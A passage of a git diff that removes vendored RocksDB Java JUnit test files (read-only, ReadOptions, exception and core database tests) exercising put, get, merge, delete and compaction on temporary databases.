-          new ArrayList<>();
-      try (final RocksDB rDb = RocksDB.openReadOnly(
-          dbFolder.getRoot().getAbsolutePath(), cfDescriptors,
-          readOnlyColumnFamilyHandleList)) {
-        try {
-          rDb.put(readOnlyColumnFamilyHandleList.get(0),
-              "key".getBytes(), "value".getBytes());
-        } finally {
-          for (final ColumnFamilyHandle columnFamilyHandle :
-              readOnlyColumnFamilyHandleList) {
-            columnFamilyHandle.close();
-          }
-        }
-      }
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
-  public void failToRemoveInReadOnly() throws RocksDBException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-      //no-op
-    }
-
-    try (final ColumnFamilyOptions cfOpts = new ColumnFamilyOptions()) {
-      final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-          new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY, cfOpts)
-      );
-
-      final List<ColumnFamilyHandle> readOnlyColumnFamilyHandleList =
-          new ArrayList<>();
-
-      try (final RocksDB rDb = RocksDB.openReadOnly(
-          dbFolder.getRoot().getAbsolutePath(), cfDescriptors,
-          readOnlyColumnFamilyHandleList)) {
-        try {
-          rDb.remove("key".getBytes());
-        } finally {
-          for (final ColumnFamilyHandle columnFamilyHandle :
-              readOnlyColumnFamilyHandleList) {
-            columnFamilyHandle.close();
-          }
-        }
-      }
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
-  public void failToCFRemoveInReadOnly() throws RocksDBException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-      //no-op
-    }
-
-    try (final ColumnFamilyOptions cfOpts = new ColumnFamilyOptions()) {
-      final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-          new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY, cfOpts)
-      );
-
-      final List<ColumnFamilyHandle> readOnlyColumnFamilyHandleList =
-          new ArrayList<>();
-      try (final RocksDB rDb = RocksDB.openReadOnly(
-          dbFolder.getRoot().getAbsolutePath(), cfDescriptors,
-          readOnlyColumnFamilyHandleList)) {
-        try {
-          rDb.remove(readOnlyColumnFamilyHandleList.get(0),
-              "key".getBytes());
-        } finally {
-          for (final ColumnFamilyHandle columnFamilyHandle :
-              readOnlyColumnFamilyHandleList) {
-            columnFamilyHandle.close();
-          }
-        }
-      }
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
-  public void failToWriteBatchReadOnly() throws RocksDBException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-      //no-op
-    }
-
-    try (final ColumnFamilyOptions cfOpts = new ColumnFamilyOptions()) {
-      final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-          new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY, cfOpts)
-      );
-
-      final List<ColumnFamilyHandle> readOnlyColumnFamilyHandleList =
-          new ArrayList<>();
-      try (final RocksDB rDb = RocksDB.openReadOnly(
-          dbFolder.getRoot().getAbsolutePath(), cfDescriptors,
-          readOnlyColumnFamilyHandleList);
-           final WriteBatch wb = new WriteBatch();
-           final WriteOptions wOpts = new WriteOptions()) {
-        try {
-          wb.put("key".getBytes(), "value".getBytes());
-          rDb.write(wOpts, wb);
-        } finally {
-          for (final ColumnFamilyHandle columnFamilyHandle :
-              readOnlyColumnFamilyHandleList) {
-            columnFamilyHandle.close();
-          }
-        }
-      }
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
-  public void failToCFWriteBatchReadOnly() throws RocksDBException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-      //no-op
-    }
-
-    try (final ColumnFamilyOptions cfOpts = new ColumnFamilyOptions()) {
-      final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-          new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY, cfOpts)
-      );
-
-      final List<ColumnFamilyHandle> readOnlyColumnFamilyHandleList =
-          new ArrayList<>();
-      try (final RocksDB rDb = RocksDB.openReadOnly(
-          dbFolder.getRoot().getAbsolutePath(), cfDescriptors,
-          readOnlyColumnFamilyHandleList);
-           final WriteBatch wb = new WriteBatch();
-           final WriteOptions wOpts = new WriteOptions()) {
-        try {
-          wb.put(readOnlyColumnFamilyHandleList.get(0), "key".getBytes(),
-              "value".getBytes());
-          rDb.write(wOpts, wb);
-        } finally {
-          for (final ColumnFamilyHandle columnFamilyHandle :
-              readOnlyColumnFamilyHandleList) {
-            columnFamilyHandle.close();
-          }
-        }
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ReadOptionsTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ReadOptionsTest.java
deleted file mode 100644
index da048c4..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ReadOptionsTest.java
+++ /dev/null
@@ -1,201 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.util.Random;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.ExpectedException;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class ReadOptionsTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public ExpectedException exception = ExpectedException.none();
-
-  @Test
-  public void verifyChecksum() {
-    try (final ReadOptions opt = new ReadOptions()) {
-      final Random rand = new Random();
-      final boolean boolValue = rand.nextBoolean();
-      opt.setVerifyChecksums(boolValue);
-      assertThat(opt.verifyChecksums()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void fillCache() {
-    try (final ReadOptions opt = new ReadOptions()) {
-      final Random rand = new Random();
-      final boolean boolValue = rand.nextBoolean();
-      opt.setFillCache(boolValue);
-      assertThat(opt.fillCache()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void tailing() {
-    try (final ReadOptions opt = new ReadOptions()) {
-      final Random rand = new Random();
-      final boolean boolValue = rand.nextBoolean();
-      opt.setTailing(boolValue);
-      assertThat(opt.tailing()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void snapshot() {
-    try (final ReadOptions opt = new ReadOptions()) {
-      opt.setSnapshot(null);
-      assertThat(opt.snapshot()).isNull();
-    }
-  }
-
-  @Test
-  public void readTier() {
-    try (final ReadOptions opt = new ReadOptions()) {
-      opt.setReadTier(ReadTier.BLOCK_CACHE_TIER);
-      assertThat(opt.readTier()).isEqualTo(ReadTier.BLOCK_CACHE_TIER);
-    }
-  }
-
-  @Test
-  public void managed() {
-    try (final ReadOptions opt = new ReadOptions()) {
-      opt.setManaged(true);
-      assertThat(opt.managed()).isTrue();
-    }
-  }
-
-  @Test
-  public void totalOrderSeek() {
-    try (final ReadOptions opt = new ReadOptions()) {
-      opt.setTotalOrderSeek(true);
-      assertThat(opt.totalOrderSeek()).isTrue();
-    }
-  }
-
-  @Test
-  public void prefixSameAsStart() {
-    try (final ReadOptions opt = new ReadOptions()) {
-      opt.setPrefixSameAsStart(true);
-      assertThat(opt.prefixSameAsStart()).isTrue();
-    }
-  }
-
-  @Test
-  public void pinData() {
-    try (final ReadOptions opt = new ReadOptions()) {
-      opt.setPinData(true);
-      assertThat(opt.pinData()).isTrue();
-    }
-  }
-
-  @Test
-  public void backgroundPurgeOnIteratorCleanup() {
-    try (final ReadOptions opt = new ReadOptions()) {
-      opt.setBackgroundPurgeOnIteratorCleanup(true);
-      assertThat(opt.backgroundPurgeOnIteratorCleanup()).isTrue();
-    }
-  }
-
-  @Test
-  public void readaheadSize() {
-    try (final ReadOptions opt = new ReadOptions()) {
-      final Random rand = new Random();
-      final long longValue = rand.nextLong();
-      opt.setReadaheadSize(longValue);
-      assertThat(opt.readaheadSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void ignoreRangeDeletions() {
-    try (final ReadOptions opt = new ReadOptions()) {
-      opt.setIgnoreRangeDeletions(true);
-      assertThat(opt.ignoreRangeDeletions()).isTrue();
-    }
-  }
-
-  @Test
-  public void failSetVerifyChecksumUninitialized() {
-    try (final ReadOptions readOptions =
-             setupUninitializedReadOptions(exception)) {
-      readOptions.setVerifyChecksums(true);
-    }
-  }
-
-  @Test
-  public void failVerifyChecksumUninitialized() {
-    try (final ReadOptions readOptions =
-             setupUninitializedReadOptions(exception)) {
-      readOptions.verifyChecksums();
-    }
-  }
-
-  @Test
-  public void failSetFillCacheUninitialized() {
-    try (final ReadOptions readOptions =
-             setupUninitializedReadOptions(exception)) {
-      readOptions.setFillCache(true);
-    }
-  }
-
-  @Test
-  public void failFillCacheUninitialized() {
-    try (final ReadOptions readOptions =
-             setupUninitializedReadOptions(exception)) {
-      readOptions.fillCache();
-    }
-  }
-
-  @Test
-  public void failSetTailingUninitialized() {
-    try (final ReadOptions readOptions =
-             setupUninitializedReadOptions(exception)) {
-      readOptions.setTailing(true);
-    }
-  }
-
-  @Test
-  public void failTailingUninitialized() {
-    try (final ReadOptions readOptions =
-             setupUninitializedReadOptions(exception)) {
-      readOptions.tailing();
-    }
-  }
-
-  @Test
-  public void failSetSnapshotUninitialized() {
-    try (final ReadOptions readOptions =
-             setupUninitializedReadOptions(exception)) {
-      readOptions.setSnapshot(null);
-    }
-  }
-
-  @Test
-  public void failSnapshotUninitialized() {
-    try (final ReadOptions readOptions =
-             setupUninitializedReadOptions(exception)) {
-      readOptions.snapshot();
-    }
-  }
-
-  private ReadOptions setupUninitializedReadOptions(
-      ExpectedException exception) {
-    final ReadOptions readOptions = new ReadOptions();
-    readOptions.close();
-    exception.expect(AssertionError.class);
-    return readOptions;
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksDBExceptionTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksDBExceptionTest.java
deleted file mode 100644
index d3bd4ec..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksDBExceptionTest.java
+++ /dev/null
@@ -1,115 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.Test;
-
-import org.rocksdb.Status.Code;
-import org.rocksdb.Status.SubCode;
-import static org.assertj.core.api.Assertions.assertThat;
-import static org.junit.Assert.fail;
-
-public class RocksDBExceptionTest {
-
-  @Test
-  public void exception() {
-    try {
-      raiseException();
-    } catch(final RocksDBException e) {
-      assertThat(e.getStatus()).isNull();
-      assertThat(e.getMessage()).isEqualTo("test message");
-      return;
-    }
-    fail();
-  }
-
-  @Test
-  public void exceptionWithStatusCode() {
-    try {
-      raiseExceptionWithStatusCode();
-    } catch(final RocksDBException e) {
-      assertThat(e.getStatus()).isNotNull();
-      assertThat(e.getStatus().getCode()).isEqualTo(Code.NotSupported);
-      assertThat(e.getStatus().getSubCode()).isEqualTo(SubCode.None);
-      assertThat(e.getStatus().getState()).isNull();
-      assertThat(e.getMessage()).isEqualTo("test message");
-      return;
-    }
-    fail();
-  }
-
-  @Test
-  public void exceptionNoMsgWithStatusCode() {
-    try {
-      raiseExceptionNoMsgWithStatusCode();
-    } catch(final RocksDBException e) {
-      assertThat(e.getStatus()).isNotNull();
-      assertThat(e.getStatus().getCode()).isEqualTo(Code.NotSupported);
-      assertThat(e.getStatus().getSubCode()).isEqualTo(SubCode.None);
-      assertThat(e.getStatus().getState()).isNull();
-      assertThat(e.getMessage()).isEqualTo(Code.NotSupported.name());
-      return;
-    }
-    fail();
-  }
-
-  @Test
-  public void exceptionWithStatusCodeSubCode() {
-    try {
-      raiseExceptionWithStatusCodeSubCode();
-    } catch(final RocksDBException e) {
-      assertThat(e.getStatus()).isNotNull();
-      assertThat(e.getStatus().getCode()).isEqualTo(Code.TimedOut);
-      assertThat(e.getStatus().getSubCode())
-          .isEqualTo(Status.SubCode.LockTimeout);
-      assertThat(e.getStatus().getState()).isNull();
-      assertThat(e.getMessage()).isEqualTo("test message");
-      return;
-    }
-    fail();
-  }
-
-  @Test
-  public void exceptionNoMsgWithStatusCodeSubCode() {
-    try {
-      raiseExceptionNoMsgWithStatusCodeSubCode();
-    } catch(final RocksDBException e) {
-      assertThat(e.getStatus()).isNotNull();
-      assertThat(e.getStatus().getCode()).isEqualTo(Code.TimedOut);
-      assertThat(e.getStatus().getSubCode()).isEqualTo(SubCode.LockTimeout);
-      assertThat(e.getStatus().getState()).isNull();
-      assertThat(e.getMessage()).isEqualTo(Code.TimedOut.name() +
-          "(" + SubCode.LockTimeout.name() + ")");
-      return;
-    }
-    fail();
-  }
-
-  @Test
-  public void exceptionWithStatusCodeState() {
-    try {
-      raiseExceptionWithStatusCodeState();
-    } catch(final RocksDBException e) {
-      assertThat(e.getStatus()).isNotNull();
-      assertThat(e.getStatus().getCode()).isEqualTo(Code.NotSupported);
-      assertThat(e.getStatus().getSubCode()).isEqualTo(SubCode.None);
-      assertThat(e.getStatus().getState()).isNotNull();
-      assertThat(e.getMessage()).isEqualTo("test message");
-      return;
-    }
-    fail();
-  }
-
-  private native void raiseException() throws RocksDBException;
-  private native void raiseExceptionWithStatusCode() throws RocksDBException;
-  private native void raiseExceptionNoMsgWithStatusCode() throws RocksDBException;
-  private native void raiseExceptionWithStatusCodeSubCode()
-      throws RocksDBException;
-  private native void raiseExceptionNoMsgWithStatusCodeSubCode()
-      throws RocksDBException;
-  private native void raiseExceptionWithStatusCodeState()
-      throws RocksDBException;
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksDBTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksDBTest.java
deleted file mode 100644
index 8989474..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksDBTest.java
+++ /dev/null
@@ -1,766 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import java.util.*;
-
-import static org.assertj.core.api.Assertions.assertThat;
-import static org.junit.Assert.fail;
-
-public class RocksDBTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  public static final Random rand = PlatformRandomHelper.
-      getPlatformSpecificRandomFactory();
-
-  @Test
-  public void open() throws RocksDBException {
-    try (final RocksDB db =
-             RocksDB.open(dbFolder.getRoot().getAbsolutePath())) {
-      assertThat(db).isNotNull();
-    }
-  }
-
-  @Test
-  public void open_opt() throws RocksDBException {
-    try (final Options opt = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(opt,
-             dbFolder.getRoot().getAbsolutePath())) {
-      assertThat(db).isNotNull();
-    }
-  }
-
-  @Test
-  public void openWhenOpen() throws RocksDBException {
-    final String dbPath = dbFolder.getRoot().getAbsolutePath();
-
-    try (final RocksDB db1 = RocksDB.open(dbPath)) {
-      try (final RocksDB db2 = RocksDB.open(dbPath)) {
-        fail("Should have thrown an exception when opening the same db twice");
-      } catch (final RocksDBException e) {
-        assertThat(e.getStatus().getCode()).isEqualTo(Status.Code.IOError);
-        assertThat(e.getStatus().getSubCode()).isEqualTo(Status.SubCode.None);
-        assertThat(e.getStatus().getState()).contains("lock ");
-      }
-    }
-  }
-
-  @Test
-  public void put() throws RocksDBException {
-    try (final RocksDB db = RocksDB.open(dbFolder.getRoot().getAbsolutePath());
-         final WriteOptions opt = new WriteOptions()) {
-      db.put("key1".getBytes(), "value".getBytes());
-      db.put(opt, "key2".getBytes(), "12345678".getBytes());
-      assertThat(db.get("key1".getBytes())).isEqualTo(
-          "value".getBytes());
-      assertThat(db.get("key2".getBytes())).isEqualTo(
-          "12345678".getBytes());
-    }
-  }
-
-  @Test
-  public void write() throws RocksDBException {
-    try (final StringAppendOperator stringAppendOperator = new StringAppendOperator();
-         final Options options = new Options()
-             .setMergeOperator(stringAppendOperator)
-             .setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath());
-         final WriteOptions opts = new WriteOptions()) {
-
-      try (final WriteBatch wb1 = new WriteBatch()) {
-        wb1.put("key1".getBytes(), "aa".getBytes());
-        wb1.merge("key1".getBytes(), "bb".getBytes());
-
-        try (final WriteBatch wb2 = new WriteBatch()) {
-          wb2.put("key2".getBytes(), "xx".getBytes());
-          wb2.merge("key2".getBytes(), "yy".getBytes());
-          db.write(opts, wb1);
-          db.write(opts, wb2);
-        }
-      }
-
-      assertThat(db.get("key1".getBytes())).isEqualTo(
-          "aa,bb".getBytes());
-      assertThat(db.get("key2".getBytes())).isEqualTo(
-          "xx,yy".getBytes());
-    }
-  }
-
-  @Test
-  public void getWithOutValue() throws RocksDBException {
-    try (final RocksDB db =
-             RocksDB.open(dbFolder.getRoot().getAbsolutePath())) {
-      db.put("key1".getBytes(), "value".getBytes());
-      db.put("key2".getBytes(), "12345678".getBytes());
-      byte[] outValue = new byte[5];
-      // not found value
-      int getResult = db.get("keyNotFound".getBytes(), outValue);
-      assertThat(getResult).isEqualTo(RocksDB.NOT_FOUND);
-      // found value which fits in outValue
-      getResult = db.get("key1".getBytes(), outValue);
-      assertThat(getResult).isNotEqualTo(RocksDB.NOT_FOUND);
-      assertThat(outValue).isEqualTo("value".getBytes());
-      // found value which fits partially
-      getResult = db.get("key2".getBytes(), outValue);
-      assertThat(getResult).isNotEqualTo(RocksDB.NOT_FOUND);
-      assertThat(outValue).isEqualTo("12345".getBytes());
-    }
-  }
-
-  @Test
-  public void getWithOutValueReadOptions() throws RocksDBException {
-    try (final RocksDB db = RocksDB.open(dbFolder.getRoot().getAbsolutePath());
-         final ReadOptions rOpt = new ReadOptions()) {
-      db.put("key1".getBytes(), "value".getBytes());
-      db.put("key2".getBytes(), "12345678".getBytes());
-      byte[] outValue = new byte[5];
-      // not found value
-      int getResult = db.get(rOpt, "keyNotFound".getBytes(),
-          outValue);
-      assertThat(getResult).isEqualTo(RocksDB.NOT_FOUND);
-      // found value which fits in outValue
-      getResult = db.get(rOpt, "key1".getBytes(), outValue);
-      assertThat(getResult).isNotEqualTo(RocksDB.NOT_FOUND);
-      assertThat(outValue).isEqualTo("value".getBytes());
-      // found value which fits partially
-      getResult = db.get(rOpt, "key2".getBytes(), outValue);
-      assertThat(getResult).isNotEqualTo(RocksDB.NOT_FOUND);
-      assertThat(outValue).isEqualTo("12345".getBytes());
-    }
-  }
-
-  @Test
-  public void multiGet() throws RocksDBException, InterruptedException {
-    try (final RocksDB db = RocksDB.open(dbFolder.getRoot().getAbsolutePath());
-         final ReadOptions rOpt = new ReadOptions()) {
-      db.put("key1".getBytes(), "value".getBytes());
-      db.put("key2".getBytes(), "12345678".getBytes());
-      List<byte[]> lookupKeys = new ArrayList<>();
-      lookupKeys.add("key1".getBytes());
-      lookupKeys.add("key2".getBytes());
-      Map<byte[], byte[]> results = db.multiGet(lookupKeys);
-      assertThat(results).isNotNull();
-      assertThat(results.values()).isNotNull();
-      assertThat(results.values()).
-          contains("value".getBytes(), "12345678".getBytes());
-      // test same method with ReadOptions
-      results = db.multiGet(rOpt, lookupKeys);
-      assertThat(results).isNotNull();
-      assertThat(results.values()).isNotNull();
-      assertThat(results.values()).
-          contains("value".getBytes(), "12345678".getBytes());
-
-      // remove existing key
-      lookupKeys.remove("key2".getBytes());
-      // add non existing key
-      lookupKeys.add("key3".getBytes());
-      results = db.multiGet(lookupKeys);
-      assertThat(results).isNotNull();
-      assertThat(results.values()).isNotNull();
-      assertThat(results.values()).
-          contains("value".getBytes());
-      // test same call with readOptions
-      results = db.multiGet(rOpt, lookupKeys);
-      assertThat(results).isNotNull();
-      assertThat(results.values()).isNotNull();
-      assertThat(results.values()).
-          contains("value".getBytes());
-    }
-  }
-
-  @Test
-  public void merge() throws RocksDBException {
-    try (final StringAppendOperator stringAppendOperator = new StringAppendOperator();
-         final Options opt = new Options()
-            .setCreateIfMissing(true)
-            .setMergeOperator(stringAppendOperator);
-         final WriteOptions wOpt = new WriteOptions();
-         final RocksDB db = RocksDB.open(opt,
-             dbFolder.getRoot().getAbsolutePath())
-    ) {
-      db.put("key1".getBytes(), "value".getBytes());
-      assertThat(db.get("key1".getBytes())).isEqualTo(
-          "value".getBytes());
-      // merge key1 with another value portion
-      db.merge("key1".getBytes(), "value2".getBytes());
-      assertThat(db.get("key1".getBytes())).isEqualTo(
-          "value,value2".getBytes());
-      // merge key1 with another value portion
-      db.merge(wOpt, "key1".getBytes(), "value3".getBytes());
-      assertThat(db.get("key1".getBytes())).isEqualTo(
-          "value,value2,value3".getBytes());
-      // merge on non existent key shall insert the value
-      db.merge(wOpt, "key2".getBytes(), "xxxx".getBytes());
-      assertThat(db.get("key2".getBytes())).isEqualTo(
-          "xxxx".getBytes());
-    }
-  }
-
-  @Test
-  public void delete() throws RocksDBException {
-    try (final RocksDB db = RocksDB.open(dbFolder.getRoot().getAbsolutePath());
-         final WriteOptions wOpt = new WriteOptions()) {
-      db.put("key1".getBytes(), "value".getBytes());
-      db.put("key2".getBytes(), "12345678".getBytes());
-      assertThat(db.get("key1".getBytes())).isEqualTo(
-          "value".getBytes());
-      assertThat(db.get("key2".getBytes())).isEqualTo(
-          "12345678".getBytes());
-      db.delete("key1".getBytes());
-      db.delete(wOpt, "key2".getBytes());
-      assertThat(db.get("key1".getBytes())).isNull();
-      assertThat(db.get("key2".getBytes())).isNull();
-    }
-  }
-
-  @Test
-  public void singleDelete() throws RocksDBException {
-    try (final RocksDB db = RocksDB.open(dbFolder.getRoot().getAbsolutePath());
-         final WriteOptions wOpt = new WriteOptions()) {
-      db.put("key1".getBytes(), "value".getBytes());
-      db.put("key2".getBytes(), "12345678".getBytes());
-      assertThat(db.get("key1".getBytes())).isEqualTo(
-          "value".getBytes());
-      assertThat(db.get("key2".getBytes())).isEqualTo(
-          "12345678".getBytes());
-      db.singleDelete("key1".getBytes());
-      db.singleDelete(wOpt, "key2".getBytes());
-      assertThat(db.get("key1".getBytes())).isNull();
-      assertThat(db.get("key2".getBytes())).isNull();
-    }
-  }
-
-  @Test
-  public void singleDelete_nonExisting() throws RocksDBException {
-    try (final RocksDB db = RocksDB.open(dbFolder.getRoot().getAbsolutePath());
-         final WriteOptions wOpt = new WriteOptions()) {
-      db.singleDelete("key1".getBytes());
-      db.singleDelete(wOpt, "key2".getBytes());
-      assertThat(db.get("key1".getBytes())).isNull();
-      assertThat(db.get("key2".getBytes())).isNull();
-    }
-  }
-
-  @Test
-  public void deleteRange() throws RocksDBException {
-    try (final RocksDB db = RocksDB.open(dbFolder.getRoot().getAbsolutePath());
-         final WriteOptions wOpt = new WriteOptions()) {
-      db.put("key1".getBytes(), "value".getBytes());
-      db.put("key2".getBytes(), "12345678".getBytes());
-      db.put("key3".getBytes(), "abcdefg".getBytes());
-      db.put("key4".getBytes(), "xyz".getBytes());
-      assertThat(db.get("key1".getBytes())).isEqualTo("value".getBytes());
-      assertThat(db.get("key2".getBytes())).isEqualTo("12345678".getBytes());
-      assertThat(db.get("key3".getBytes())).isEqualTo("abcdefg".getBytes());
-      assertThat(db.get("key4".getBytes())).isEqualTo("xyz".getBytes());
-      db.deleteRange("key2".getBytes(), "key4".getBytes());
-      assertThat(db.get("key1".getBytes())).isEqualTo("value".getBytes());
-      assertThat(db.get("key2".getBytes())).isNull();
-      assertThat(db.get("key3".getBytes())).isNull();
-      assertThat(db.get("key4".getBytes())).isEqualTo("xyz".getBytes());
-    }
-  }
-
-  @Test
-  public void getIntProperty() throws RocksDBException {
-    try (
-        final Options options = new Options()
-            .setCreateIfMissing(true)
-            .setMaxWriteBufferNumber(10)
-            .setMinWriteBufferNumberToMerge(10);
-        final RocksDB db = RocksDB.open(options,
-            dbFolder.getRoot().getAbsolutePath());
-        final WriteOptions wOpt = new WriteOptions().setDisableWAL(true)
-    ) {
-      db.put(wOpt, "key1".getBytes(), "value1".getBytes());
-      db.put(wOpt, "key2".getBytes(), "value2".getBytes());
-      db.put(wOpt, "key3".getBytes(), "value3".getBytes());
-      db.put(wOpt, "key4".getBytes(), "value4".getBytes());
-      assertThat(db.getLongProperty("rocksdb.num-entries-active-mem-table"))
-          .isGreaterThan(0);
-      assertThat(db.getLongProperty("rocksdb.cur-size-active-mem-table"))
-          .isGreaterThan(0);
-    }
-  }
-
-  @Test
-  public void fullCompactRange() throws RocksDBException {
-    try (final Options opt = new Options().
-        setCreateIfMissing(true).
-        setDisableAutoCompactions(true).
-        setCompactionStyle(CompactionStyle.LEVEL).
-        setNumLevels(4).
-        setWriteBufferSize(100 << 10).
-        setLevelZeroFileNumCompactionTrigger(3).
-        setTargetFileSizeBase(200 << 10).
-        setTargetFileSizeMultiplier(1).
-        setMaxBytesForLevelBase(500 << 10).
-        setMaxBytesForLevelMultiplier(1).
-        setDisableAutoCompactions(false);
-         final RocksDB db = RocksDB.open(opt,
-             dbFolder.getRoot().getAbsolutePath())) {
-      // fill database with key/value pairs
-      byte[] b = new byte[10000];
-      for (int i = 0; i < 200; i++) {
-        rand.nextBytes(b);
-        db.put((String.valueOf(i)).getBytes(), b);
-      }
-      db.compactRange();
-    }
-  }
-
-  @Test
-  public void fullCompactRangeColumnFamily()
-      throws RocksDBException {
-    try (
-        final DBOptions opt = new DBOptions().
-            setCreateIfMissing(true).
-            setCreateMissingColumnFamilies(true);
-        final ColumnFamilyOptions new_cf_opts = new ColumnFamilyOptions().
-            setDisableAutoCompactions(true).
-            setCompactionStyle(CompactionStyle.LEVEL).
-            setNumLevels(4).
-            setWriteBufferSize(100 << 10).
-            setLevelZeroFileNumCompactionTrigger(3).
-            setTargetFileSizeBase(200 << 10).
-            setTargetFileSizeMultiplier(1).
-            setMaxBytesForLevelBase(500 << 10).
-            setMaxBytesForLevelMultiplier(1).
-            setDisableAutoCompactions(false)
-    ) {
-      final List<ColumnFamilyDescriptor> columnFamilyDescriptors =
-          Arrays.asList(
-              new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-              new ColumnFamilyDescriptor("new_cf".getBytes(), new_cf_opts));
-
-      // open database
-      final List<ColumnFamilyHandle> columnFamilyHandles = new ArrayList<>();
-      try (final RocksDB db = RocksDB.open(opt,
-          dbFolder.getRoot().getAbsolutePath(),
-          columnFamilyDescriptors,
-          columnFamilyHandles)) {
-        try {
-          // fill database with key/value pairs
-          byte[] b = new byte[10000];
-          for (int i = 0; i < 200; i++) {
-            rand.nextBytes(b);
-            db.put(columnFamilyHandles.get(1),
-                String.valueOf(i).getBytes(), b);
-          }
-          db.compactRange(columnFamilyHandles.get(1));
-        } finally {
-          for (final ColumnFamilyHandle handle : columnFamilyHandles) {
-            handle.close();
-          }
-        }
-      }
-    }
-  }
-
-  @Test
-  public void compactRangeWithKeys()
-      throws RocksDBException {
-    try (final Options opt = new Options().
-        setCreateIfMissing(true).
-        setDisableAutoCompactions(true).
-        setCompactionStyle(CompactionStyle.LEVEL).
-        setNumLevels(4).
-        setWriteBufferSize(100 << 10).
-        setLevelZeroFileNumCompactionTrigger(3).
-        setTargetFileSizeBase(200 << 10).
-        setTargetFileSizeMultiplier(1).
-        setMaxBytesForLevelBase(500 << 10).
-        setMaxBytesForLevelMultiplier(1).
-        setDisableAutoCompactions(false);
-         final RocksDB db = RocksDB.open(opt,
-             dbFolder.getRoot().getAbsolutePath())) {
-      // fill database with key/value pairs
-      byte[] b = new byte[10000];
-      for (int i = 0; i < 200; i++) {
-        rand.nextBytes(b);
-        db.put((String.valueOf(i)).getBytes(), b);
-      }
-      db.compactRange("0".getBytes(), "201".getBytes());
-    }
-  }
-
-  @Test
-  public void compactRangeWithKeysReduce()
-      throws RocksDBException {
-    try (
-        final Options opt = new Options().
-            setCreateIfMissing(true).
-            setDisableAutoCompactions(true).
-            setCompactionStyle(CompactionStyle.LEVEL).
-            setNumLevels(4).
-            setWriteBufferSize(100 << 10).
-            setLevelZeroFileNumCompactionTrigger(3).
-            setTargetFileSizeBase(200 << 10).
-            setTargetFileSizeMultiplier(1).
-            setMaxBytesForLevelBase(500 << 10).
-            setMaxBytesForLevelMultiplier(1).
-            setDisableAutoCompactions(false);
-        final RocksDB db = RocksDB.open(opt,
-            dbFolder.getRoot().getAbsolutePath())) {
-      // fill database with key/value pairs
-      byte[] b = new byte[10000];
-      for (int i = 0; i < 200; i++) {
-        rand.nextBytes(b);
-        db.put((String.valueOf(i)).getBytes(), b);
-      }
-      db.flush(new FlushOptions().setWaitForFlush(true));
-      db.compactRange("0".getBytes(), "201".getBytes(),
-          true, -1, 0);
-    }
-  }
-
-  @Test
-  public void compactRangeWithKeysColumnFamily()
-      throws RocksDBException {
-    try (final DBOptions opt = new DBOptions().
-        setCreateIfMissing(true).
-        setCreateMissingColumnFamilies(true);
-         final ColumnFamilyOptions new_cf_opts = new ColumnFamilyOptions().
-             setDisableAutoCompactions(true).
-             setCompactionStyle(CompactionStyle.LEVEL).
